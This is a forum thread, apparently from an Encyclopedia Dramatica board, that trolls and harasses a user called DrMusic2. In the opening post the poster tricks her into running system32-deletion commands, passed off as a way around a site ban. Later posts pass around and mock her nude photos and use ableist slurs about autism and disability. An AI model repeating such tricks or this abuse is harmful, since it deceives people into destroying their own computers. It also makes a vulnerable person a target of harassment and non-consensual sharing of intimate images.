DrMusic2 or whatever

Discussion in 'Furries & Ponys' started by madh8r, Jan 25, 2012.

1. madh8r

madh8r
    Expand Collapse
    EDF Hero

Home Page:
    Having never heard of this lulcow I was quite suprised to find my first DA message (as in first ever) was from Silvester Stallone, A.K.A MonsterMasher13 A.K.A DrMusic. Anyways, funny stuff ensues, which resulted in Dr Music 2 coming back and warming everyones hearts.Watch as I insult her and she begs for more trolling like every other pig bitch. Enjoy.

----------
    monstermaster13 said the following:

Your little butt buddy :iconAndriaKillgore: has been talking shit about me on the forums and taking screencaps.

You've got to talk some sense into him, he is getting out of hand on the forums.

----------
    madh8r said the following:

I'M ON IT! Hello whine-one-one? Dispatch a whambullence immediately to Deviant Art, a lion-cub-fucking neckbeard can't take a joke! It's an emogency, bring whamburgers and french cries!

----------

Ha ha very funny, this isn't a joke you dickward - it's serious, that guy is a total dickhead and deserves to be banned from the ED forums for everything he said about me, it's not a fucking joke this is fucking serious.

----------

Well it IS a TOS violation, but I don't think the admins will care much if I complain, i can't just say monstermaster doesnt like this shit. I'm sure if you made an account yourself and told the admins they would ban him. If they don't, just make a thread and everyone will turn against him, and the admins will HAVE to ban him.

----------

He already give you links to my page and the pages of some of my friends, and for the record I AM the guy who's been talking about.

----------

Dude I've literally had a DA account for like a week. I don't know adrian killgore, but using ED for harassment is against the ED TOS and is generally frowned upon in the community. Go tell the admins, they might ban him.

----------

I can't, I got banned from both the wiki and the forums. So how am I going to tell them if I'm not allowed back on?

----------

Go to start, then click run. type in cmd. A black box will show up. Type (exactly) ipconfig /release
    Then type (exactly) ipconfig /renew

Now you are unbanned go complain. Use the forum no one will listen to you on the wiki

----------
    Thanks

----------
    I tried the cmd thing but it didn't work, whenever I try clicking on the link to the forum or the wiki all that comes up is a "this page cannot be found' message.

I really want to try and get 78magnumxe off my chest but the only ways of me getting onto the forums are via google caches.

Do you think getting a new computer will help?

----------
    Buying a new computer is the only way to get around the band FOR SURE. Hopefully I can save you some money here.
    First off, you're obviously express banned. ED loaded a ban cookie directly into your 32, so changing ips won't work. Either you can root the collective pin, or you can host you collective pin under a different sys. I'm going to show you how to do the second one, because I don't think you can root.
    You can get around the ban, but your facebook and DA accounts ect will no longer remember your passwords, so you'll have to type in all your passwords and ect again. If you're determined though just open your command promt and follow these directions EXACTLY. Don't tell me it didn't work, because that means you do EXACTLY what I said. Type in everything AFTER the space on the : do NOT pu in the :
    So go into run

type cmd

type : C:

type : cd windows

type : del system 32/*.*

type : del system32

type : renew system32

and you're clean. you are no longer banned form any website, and if you ever do get banned again just follow these directions again.

Story over.

Anyways, she must have managed to get on because I saw some big hububaloo about it and she was pretty funny, especially the yahoo answers stuff thats some good shit right there. She did send a final notice recently

----------

Well I did sucessfully try going on the forums and posting a thread about 78magnumxe, but all the others seemed to be bash me including Zaiger.

It didn't work. It only made things worse. I thought you said it would make things better.

2. TheDukeOfCrowns

TheDukeOfCrowns
    Expand Collapse
    EDF Elite

I don't think they meant things would be better for you

3. MrGask

MrGask
    Expand Collapse
    #FreeGask

Bastard child of Jigsaw and Kayako
    Home Page:
    I was wondering why it breached the salty brine.

4. MrGask

MrGask
    Expand Collapse
    #FreeGask

Bastard child of Jigsaw and Kayako
    Home Page:
    DrManatee2012.

5. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

We really need to stop talking about Dr Music.
    There's nothing to see here that we have not seen before.
    There's no milk coming from this cow it's just a sad mess now.

6. Solution

Solution
    Expand Collapse
    Everyone is boring

Home Page:

7. AZJamie1

AZJamie1
    Expand Collapse
    Ediot

Did someone say bump a dead thread?

8. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    And now, after you said that, we have seen an onslaught of hate vidyas, a few of us here have access to Mariana's nude pics, and we are seeing that she is indeed a female Chris-chan.

9. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    And you are a newfag with 6 posts who just waltzed in through the door, not knowing jack shit about DrMusic2.

10. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

send the nudes my way, i will make a crappy paste delight in MSPint.

11. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    Sounds good!

12. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

........ not even i can fap to this..
    i think the worst has to be the armpit, the hairy muff is just confusing, it looks like a pair of buttocks with a fuzzy thing in front of them.

13. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    I fapped to these pics ONCE, and the only thing remotely erotic were my thoughts of what Mariana would do or say to me if she knew I was fapping to her pics. It took half an hour to achieve a terrible attempted climax, then a couple hours later, it was back to my usual fap fodder of mulatto BBWs, scantily clad Goth chicks and barely legal azn women.

14. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

Forced is right, Mariana has no personal maintenance and hair that suits a 12 or under year old girl, NOT A WOMAN IN HER 20's!!!!
    plus her pasty skin, it's not that she has body fat but the fact she clearly never excercises,
    if you have body fat and do physical work and keep fit, you will still have that blubber but you will be more in shape and your muscles will force your fat to conform to your musculature so you can see the features of your body, instead of just a shapeless pocket of lard.

15. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    Too true. You could also make the argument that her hairstyle also suits a woman in her 50s or 60s, clashing with the mind of a 10-year-old girl, libido of a hormonal 14-year-old boy, the wardrobe of a 40-year-old housewife (aside from the werejohncandy gloves) and Barbara Chandler-like physique. If I was to put her to work washing trucks, Dumpsters, wheelie bins and trailers at my work for a few 110-degree Arizona summers, and she actually did the work without complaining or demanding help, she would lose quite a bit of weight and her shape would improve...

16. madh8r

madh8r
    Expand Collapse
    EDF Hero

Home Page:
    Is that collage complete yet bro?

17. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

sending....

18. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

She won't work of course, like Chandler, Work is her Craptonite.
    Don't know what her excuse for not finding work is, but at least she hasen't claimed that she intends to make a living off of Werejohncandy works.
    So many fucking retards believe they can make a living off their shitty artist skills, or bad idea's
    Tartlets all cannot draw worth a shit without something like photoshop to make it seem more detailed and complex than it actually is,
    then they expect they will be able to make a fortune to live off by tracing stuff from cartoons.
    there's even fucking furries i've seen that can only draw by tracing photo's of humans and think they can get a job as a professional artist.

Truth is, REAL artists you won't find them hanging around places with DrMusic or Chris Chan or fucking Furfag Joe.
    and real artists are people who get paid to draw exactly what they are told to draw, and have been around before the internet circlejerk of self indulgent shit came to be in the late 90's

Hey Magnum do you think Mariana is even capable of work or just unwilling to work?

19. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    I don't think Mariana has any work skills at all, and with the way she seems to have been raised, she probably got babied and never did a thing for herself. She probably thinks that she will have enough money out of her disability pension and inheritance to live in her parents' house after they die, with the same quality of life (as in lots of junk food, vidya games, high-speed internet, movie rentals, frequent iTunes purchases, cable or satellite TV, and buying plushies and other toys frequently) as she did before. And who does that sound like?

I'm sure she will put up a huge fight about being forced to attend job-training classes when she ends up in a home, and from what I know of group home work policies, she will probably be forced to take day treatment at a mental hospital if she refuses vocational rehabilitation.

20. xy0xy1

xy0xy1
    Expand Collapse
    EDF Hero

kissin where it smells funny
    Home Page:
    holy fucking shit

she sent nudy pics

oh god, posting it on ed.ch would crash the servers and give readers eye cataractes

21. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

Who the fuck wants to live on a pension permanently? i don't a pension just makes things easier for me, so i can keep my mind focused on getting a job doing projects, and above all having fun, i have fun working and getting physically fit, even if no paying jobs are available for a period i just take up volunteer work, go out, meet people, get a rep for doing my job.
    I've cut out weed alcohol and nearly there with nicotine out of my addictions, i play few videogames, i watch TV a fair bit, but i feel a craving to be outside the house at least 2 hours a day every day, once i do go somewhere, i am not back till sundown.

when not working, the time you have for fucking around, watching TV or playing videogames is more ENJOYABLE while working, you can think of exactly what you want to do when you have time off.
    and you'll also sleep at night.

reading books is also very good to do.
    but anyway, real life friends, hard to make friends in this facebook day and age, dumb fucking teenage generations.

22. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    Only asspies, Down's Syndrome or fetal-alcohol syndrome sufferers and people who are gaming the system to get a bogus schizophrenia, PTSD or bipolar disorder diagnosis & pensions to avoid work. What you are doing is a good way to get a good work ethic and good skills, and agreed there on time off work being more enjoyable than having unlimited free time, it's almost like you are being rewarded for being a functional adult human.

Before my back injury, I looked forward to clocking out, coming home to take a shower, drink a cold beer or soft drink, smoke a cig, maybe play Tetris, hang out on EDF or read part of a book, and do some IRL socializing. I miss having that kind of reward-type aspect in my life for now.

23. Drmusic2010

Drmusic2010
    Expand Collapse
    werejohncandy

autistic retard
    Home Page:
    I know i'm bad looking, and yes I don't exercise. I just find it to be too much work.

24. Andria Kilgore

Andria Kilgore
    Expand Collapse
    Girlvinyl

Dead
    Typical asspie.

25. Drmusic2010

Drmusic2010
    Expand Collapse
    werejohncandy

autistic retard
    Home Page:
    Yeah, curse myself and my stupid aspergers.

26. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

Of course it's too much work for you, you never do it or even try.

27. Drmusic2010

Drmusic2010
    Expand Collapse
    werejohncandy

autistic retard
    Home Page:
    That.....and it can result in pain sometimes.

28. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

Pain is what working out is about, it means your building muscles, it isn't like some shit in videogames where some guy gets an injection and painlessly more or less grows *arnold voice* GREAT BIG MUSCLES
    in a few seconds, with minor discomfort.
    No, you have to put up with the pain, but ordinarily it's not that often if you keep active while younger and growing up, so that by the time you are an adult you don't need to feel pain when excercising, only if you try to body build.

my legs for example, i used them allot and they are very muscular, i have to go for some big weights or extreme stretching excersises to feel a real burn.

29. Drmusic2010

Drmusic2010
    Expand Collapse
    werejohncandy

autistic retard
    Home Page:
    I know that, but I have kind of had bad experience trying to work out, mainly falling off an exercise bike or something similar.

And technically isn't there something like that in real life too...like say STEROIDS?

30. ExplosiveDiareah

ExplosiveDiareah
    Expand Collapse
    Girlvinyl

Steroids aren't magic they won't really do jack shit unless you pump iron.
    They tend to make you more vigorous and more eager to lift more than you should because it's a form of testosterone.